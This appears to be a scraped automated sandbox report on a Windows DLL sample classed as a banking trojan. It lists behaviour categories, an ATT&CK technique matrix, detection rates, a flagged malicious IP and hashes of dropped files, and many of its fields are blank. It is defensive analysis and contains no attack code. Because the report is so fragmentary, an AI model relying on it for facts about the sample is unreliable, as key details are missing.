Source: | Section loaded: |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | |||
Source: | Memory written: | |||
Source: | Memory written: | |||
Source: | Memory written: |
Source: | Memory protected: | ||
Source: | Memory protected: | ||
Source: | Memory protected: | ||
Source: | Memory protected: | ||
Source: | Memory protected: |
Source: | Memory allocated: |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | |||
Source: | Memory written: | |||
Source: | Memory written: |
Source: | Thread register set: | Jump to behavior | ||
Source: | Thread register set: | Jump to behavior | ||
Source: | Thread register set: |
Source: | Thread created: | Jump to behavior | ||
Source: | Thread created: | |||
Source: | Thread created: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | |||
Source: | Process created: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 3_2_04DE12D3 |
Source: | Key value queried: | Jump to behavior |
Source: | Code function: | 3_2_04DE5410 |
Source: | Code function: | 3_2_04DE515F |
Source: | Code function: | 3_2_04DE12D3 |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | 1 Windows Management Instrumentation | Path Interception | 812 Process Injection | 1 Obfuscated Files or Information | OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 2 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 Data Encrypted for Impact |
Default Accounts | 2 Native API | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 File Deletion | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Email Collection | Exfiltration Over Bluetooth | 2 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | Logon Script (Windows) | 1 Masquerading | Security Account Manager | 1 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 31 Virtualization/Sandbox Evasion | NTDS | 25 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 11 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 812 Process Injection | LSA Secrets | 1 Query Registry | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Rundll32 | Cached Domain Credentials | 11 Security Software Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | 31 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 3 Process Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction | |
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | 1 System Owner/User Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | ||
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | 11 Remote System Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop | ||
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Rename System Utilities | Keylogging | 1 System Network Configuration Discovery | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
37% | Virustotal | Browse | ||
31% | ReversingLabs | Win32.Trojan.Lazy | ||
100% | Joe Sandbox ML |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | HEUR/AGEN.1245293 | Download File |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Virustotal | Browse | ||
0% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
l-0007.l-dc-msedge.net | 13.107.43.16 | true | true |
| unknown |
a-0019.standard.a-msedge.net | 204.79.197.222 | true | false |
| unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| low | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
146.70.35.138 | unknown | United Kingdom | 2018 | TENET-1ZA | true |
IP |
---|
192.168.2.1 |
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 613862 |
Start date and time: 22/04/202215:25:25 | 2022-04-22 15:25:25 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 13m 32s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | HxEWwh74qT (renamed file extension from none to dll) |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 41 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 2 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.bank.troj.evad.winDLL@28/29@0/2 |
EGA Information: |
|
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
- Excluded IPs from analysis (whitelisted): 20.42.65.92, 13.107.43.16, 52.182.143.212
- Excluded domains from analysis (whitelisted): fp.msedge.net, client.wns.windows.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, arc.msn.com, ris.api.iris.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, 1.perf.msedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, config.edge.skype.com
- Execution Graph export aborted for target mshta.exe, PID 6304 because there are no executed function
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description |
---|---|---|
15:26:45 | API Interceptor | |
15:26:53 | API Interceptor | |
15:27:31 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
146.70.35.138 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
a-0019.standard.a-msedge.net | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
l-0007.l-dc-msedge.net | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
TENET-1ZA | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
⊘No context
⊘No context
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_2828325eddc3a9f8faabde465b0f08bdb67a44e_7cac0383_17ca004a\Report.wer
Download File
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.8464047761659802 |
Encrypted: | false |
SSDEEP: | 96:85XB+F6wnYypy9haoKzfFEpXIQcQRc6+vcECAcw3p+a+z+HbHgiTAS/Y5ZU6h5P6:8pB+7nSHPKvBdjlq/u7sDS274ItW |
MD5: | B50C687C29BF44DAF94017951E1B1FA4 |
SHA1: | 035A1C3720BC2834F2EEA0B5C5C012FFCFA54D59 |
SHA-256: | 2B8D1BCCBD738DC93D23DB997E54B92B08D8E46F1DA33DA0159495779135CCD0 |
SHA-512: | 749ADFCD605FB1A481BD7387B9F447457050DE42C0F57139F9484EB263EE92A7451039AC45EF6E928D93B5D735FE058F194D1D43BEDE11862AB322AB284A97FA |
Malicious: | false |
Preview: |
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_82d8da601ff98714cf9338fbdd7f7aa4314182a_7cac0383_186e5281\Report.wer
Download File
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.8494287362949074 |
Encrypted: | false |
SSDEEP: | 96:88XxGFrhPwnYyTy9haot7JnXpXIQcQac6pcEccw35+a+z+HbHgiTAS/Y5ZU6h5Pg:8c8hynSH0tGtjlq/u7syS274ItW |
MD5: | 25AA9B5977F4E6E9486A6B0AA7367E53 |
SHA1: | 49203D9B2C61AF1B0886A6DCF260AA93CA21B2BB |
SHA-256: | 83C38D8B07784190C93DD783EE9D288CE2522B878FC5082287770ADAE6C7C018 |
SHA-512: | 21BC08B3F8B1445C51C6C45A996D87811B58E18F55AC3DAD19DF5675AD7A82B4552F3FEB909001E92E4045AE9A84D5C23C857A613A3DF57B5A38813345F5559E |
Malicious: | false |
Preview: |
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_f73ca53a05f727fe3c280efd3588c9d22d24062_7cac0383_0d5dc489\Report.wer
Download File
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.8429193116744815 |
Encrypted: | false |
SSDEEP: | 96:xqjA46wnYyNy9haoK7FISZpXIQcQac6pcEccw35+a+z+HbHgiTAS/Y5ZU6h5PMLv:xgnxH0tGtjlq/u7sDS274Itb |
MD5: | B662C448457F42C86FF6AE872E829F12 |
SHA1: | 6B760A764DFF5FEDE5A923E3953359ABE59BF098 |
SHA-256: | BCA2030589C0C03A6958D7A5A60968DDE5EF57E5FE4861A63A6EF3D687A1F6F0 |
SHA-512: | 963A1D9194D6E19BAA6017D869B19420FE20A2A8839A570E7B3B21EF9CF0337FFA35C32913BF72556B612D8FBCFFC096D197F5D7A9A557F35F641EA84B2809B1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 41334 |
Entropy (8bit): | 2.004648071633227 |
Encrypted: | false |
SSDEEP: | 192:A854coHsADYmaZyZOGKWtP75TTmlZRCXL5CpVfS:A4yshxbGttP75TinRCXFCS |
MD5: | 045591FB9A51E43D170A2F09CC3DADC1 |
SHA1: | 81CF74B064211B7258D207E5E299206175584D6D |
SHA-256: | AC3064CB253A5F508A4883613F1FA63A694AE5572B5D22F80E4F38375E533FD2 |
SHA-512: | D100B85B0237B4D327966B3F7B19E55FBAC7ABBA83C6C7D1262EF07F68D10B8E5D9B1E08B25C9EA5A31875E220DA022555AA87F0C4AB4126213DBAC6BA620449 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8356 |
Entropy (8bit): | 3.6933010429084745 |
Encrypted: | false |
SSDEEP: | 192:Rrl7r3GLNitC66q06YpoSU5zgmflSQCpNP89b571fHTm:RrlsNio686YWSU5zgmflSu5Jfq |
MD5: | 0DB5E90F9A50EBD43F3DF77C0DA85950 |
SHA1: | B4EB81ABFEDA2C5FCF0A3F8D04F78B19BFB1BF70 |
SHA-256: | 833B8C530A023BD671DDD8012AA17D0C0F15F255008D3C946443CCE66ADC0BFF |
SHA-512: | 3839036F675F9945C835F7E058C20ECF6191E7FC1A654899335ED4B3FC8D081556890C5509E7EFF953E743CA2975C1019517564FB3F9EE36432A362698E287C5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4665 |
Entropy (8bit): | 4.431687079649683 |
Encrypted: | false |
SSDEEP: | 48:cvIwSD8zsIJgtWI92gWgc8sqYjhq8fm8M4J2+AFpdW+q8vQ+CKcQIcQw0ld:uITfOxZgrsqY1fJBKmKkw0ld |
MD5: | 1DBFF782298A0B63A1CC9CDF1DF61976 |
SHA1: | 3024D4229EEE1DFBB8E000183F6CDFAC66732407 |
SHA-256: | 6BC464DB5E86A06C79A21B34035437175F2C1D128EE0DCE7DC01D45E2E1CD1D8 |
SHA-512: | EF28376A35433F6278CA36321C4DA9F000AAC8DAB3BD9EA7A829D1B65F81BCCD88528442B9CDAD2EE707C5B2E44FF663A62C4BB249417C1686E9B1BC276F0FE4 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 41134 |
Entropy (8bit): | 1.975058856907694 |
Encrypted: | false |
SSDEEP: | 192:+5mcXsADYmaM3IdOGKWhi075TTxZ6Tpdy2FjrFJDq:evshcGtQ075TH6Tpvq |
MD5: | 2001588067FFF81F56C55A45CFC8D00C |
SHA1: | FCC83C72DF6A50E9E5A0B2EE60D4AF17CAFF3F79 |
SHA-256: | 6F54FE4171D5D68F0FBDCC4AAE1C49EA13E04D8A592EDDE299D97232536071EB |
SHA-512: | 4F7C5711FC707A734BEE855473D6EABFEB555166F537BBEBFBDB7503BF8844E38A589AAE5BE29C9769DDD9181252F807FEEA58C56E5410AEF18287576118DE24 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8340 |
Entropy (8bit): | 3.69963560991601 |
Encrypted: | false |
SSDEEP: | 192:Rrl7r3GLNit06nfq06YprSUYWgmfcSQCprk89bFzsfsXm:RrlsNie6x6YFSUYWgmfcSZFYfB |
MD5: | 516269548DB5CE174DADC69DEBA1EB5C |
SHA1: | 11FAF3721AA9894B5591B1BCE04F5F72D2DC8DE4 |
SHA-256: | E9EF7AB53DF211C4A0A1D12C6E5A073BF1F9702B1A6EBE440E9C23BCA2565AC6 |
SHA-512: | 2139A4ED0CB86BAACA05655D9D074F36C99E7F75B523FDC9CFAE55742F13958D2D3E34A44D1FDF05764FA21ECCC19F08AAD006CC13DCBA4592C987D8E0E52604 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4598 |
Entropy (8bit): | 4.471806474905488 |
Encrypted: | false |
SSDEEP: | 48:cvIwSD8zsIJgtWI92gWgc8sqYjhF8fm8M4J2+hZFRb+q849krKcQIcQw0kd:uITfOxZgrsqY1yJbdbarKkw0kd |
MD5: | DED0973B6E25A0EFCBA8347616282B2D |
SHA1: | 488F0BA05EEBD3FD6F3234A170074152C02906B3 |
SHA-256: | 358350ADB96A3F7620569B6C9551773225FC09060ED4C99FFC5F3E2BC6FF9AC3 |
SHA-512: | 2103F5C5D1021053BB37E577665D57B4961B33881BBC084F2E881C358AEF87395A55FCDE151E785922BE39066AE97A0A5E29EEC3B9BFF88F9F2A5127972B76A5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 54158 |
Entropy (8bit): | 2.188437702004145 |
Encrypted: | false |
SSDEEP: | 192:v5FcMhsADYmaNnOGKWSV+hHTpg0DAKwZhbvB5isF7h75TT+nZPnnTlODfE9zsQ:xxsh4GtjhjAKwZhbziwV75TaZPnhsQ |
MD5: | 8C90697300310A9955BFECD8FBE19128 |
SHA1: | 89ECCBCAF68529209F03D80BB216F6AB2E42020D |
SHA-256: | B47100BC6B1B609C64B3ACE915F911B109B86CE453B7A16B0884763B01B5ADB8 |
SHA-512: | AAEFEB710D9ACD68122BD0844F854B9B77E00618ED321759257D2228C7F648D9065E131F4259E3D78F9B4604A7B8A0F5D0AF50615F45747E1BC68045E50655AB |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8294 |
Entropy (8bit): | 3.696774268699421 |
Encrypted: | false |
SSDEEP: | 192:Rrl7r3GLNitQ67q06YpbSUGmgmfqSJ7CpD989bFLzsf8fzm:RrlsNia616Y1SUGmgmfqSJxFLYfMq |
MD5: | 62B8619A4E1DEEB3CFE96784DC7BCE24 |
SHA1: | 7B61FB3B1F695606412A6DA9E26671521D321E0D |
SHA-256: | A5988942CA222FF850B4FFBEA7BE18868602C422ABFCA475C81EBAAC33718685 |
SHA-512: | AA5091E3E6A2D713E1D0C0473B38220990ED51190061251FE44C791EF70FA8189FEF2F119990E92C5B49CC59F0138587FBD48A22D4A21AD8B48A99BABEDD6D7D |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4564 |
Entropy (8bit): | 4.4450578324351975 |
Encrypted: | false |
SSDEEP: | 48:cvIwSD8zsIJgtWI92gWgc8sqYjhj8fm8M4J2+bF4+q84CPKcQIcQw0kd:uITfOxZgrsqY1gJocKkw0kd |
MD5: | 94F0237F61D6A72BF9FD262D5DAF1CB8 |
SHA1: | 77BA53C28A3D168D892F2D06300803EC5CF62C34 |
SHA-256: | 0A82D2F9FA529CEBB573FD7A8D54A1EE0C689179A013A2B1AA5C3F6E7F333A79 |
SHA-512: | D3F0BD47566C109A1DC34A0128DDBD00B4C61C99A3DAD26A29CD182AACA889854305F960FF503BCA681E097273D18372BCE4D380B2F3ED718C0AAFD1D207EBE5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 11606 |
Entropy (8bit): | 4.883977562702998 |
Encrypted: | false |
SSDEEP: | 192:h9smd3YrKkGdcU6CkVsm5emla9sm5ib4q4dVsm5emdjxoeRjp5Kib4nVFn3eGOVo:ySib4q4dvEib4nVoGIpN6KQkj2frkjhQ |
MD5: | 243581397F734487BD471C04FB57EA44 |
SHA1: | 38CB3BAC7CDC67CB3B246B32117C2C6188243E77 |
SHA-256: | 7EA86BC5C164A1B76E3893A6C1906B66A1785F366E092F51B1791EC0CC2AAC90 |
SHA-512: | 1B0B1CD588E5621F63C4AACC8FF4C111AD9148D4BABE65965EC38EBD10D559A0DFB9B610CA3DF1E1DD7B1842B3E391D6804A3787B6CD00D527A660F444C4183A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 0.9260988789684415 |
Encrypted: | false |
SSDEEP: | 3:Nlllulb/lj:NllUb/l |
MD5: | 13AF6BE1CB30E2FB779EA728EE0A6D67 |
SHA1: | F33581AC2C60B1F02C978D14DC220DCE57CC9562 |
SHA-256: | 168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F |
SHA-512: | 1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | modified |
Size (bytes): | 1336 |
Entropy (8bit): | 4.0070959147380645 |
Encrypted: | false |
SSDEEP: | 24:HJm9ZLo1c8ZH+hKdNwI+ycuZhNwakScPNnq9Sd:uSrZ0Kdm1ulwa3Mq9C |
MD5: | 0207AEB635BFA2BFB793AA26D45D28BC |
SHA1: | EFC69E173AB42B6B1AF939C8BE54DC73301AC851 |
SHA-256: | C94D40766F2B91F22AD5E55BA35D947AE2825F5B9A34E0ECE134B0A86ECCE5AF |
SHA-512: | B11F2E0DFE55984263E6BA60EE1B95E6D07588F64435CD4EF2D972A41819E37AB5DCBE268671C67D7D4ADDC6EEF99FC31CE1162BFAD35D68B71E8F3400B45777 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | modified |
Size (bytes): | 1336 |
Entropy (8bit): | 4.01926801632089 |
Encrypted: | false |
SSDEEP: | 24:Hbm9ZM+IZHUhKdNwI+ycuZhNUsvakSfsIPNnq9Sd:QeZGKdm1ul/a3jq9C |
MD5: | 79C2F50A254E8807286FA0F3634DCDAA |
SHA1: | 3ED67CB1DE55A3B1B93CBD8510385B9608F4F624 |
SHA-256: | 983C6748597DC864F47D16C32EAAA59C226FBE8DF3ADCC37C48640A59BAD0C93 |
SHA-512: | 7AE7FA180A5A95550FD00DA6B9AF07FD777251B713683B66512C6DE624BB823C9B6D0A99DF8678A9006EE87B8C9244C974B945D135FA1433384649AB175836CF |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.087313141948283 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryWlklqqak7YnqqFlklqbPN5Dlq5J:+RI+ycuZhNUsvakSfsIPNnqX |
MD5: | 3D9C89F9813A7154E8FB79DA7D10E8B2 |
SHA1: | 4E2EA7F78C62941F644D9F1FAD64D127E31306CE |
SHA-256: | B76B5C81AFE17B214527AC8DCD85285CED0102DC6164A4304188B5D4D4E69239 |
SHA-512: | 72123D606437DA61F2D52D44E329F6CD0E9CB6CD86A3739436F54889D0972FBA14EFB814D244B2A2CEBA34730E6B2C15226A5403BE8C0F7886D396A3021FCA9F |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 417 |
Entropy (8bit): | 5.038440975503667 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJlmMRSRa+eNMjSSRr/++5xVBuSRNA5cWGQRZry:V/DTLDfu09eg5rG+5zBlK5Ny |
MD5: | AE91D1351B9FB773FEF9B6F31D0A22EE |
SHA1: | 323F9FAD2F10ABDC97A7BF643A35DE67E3A32E31 |
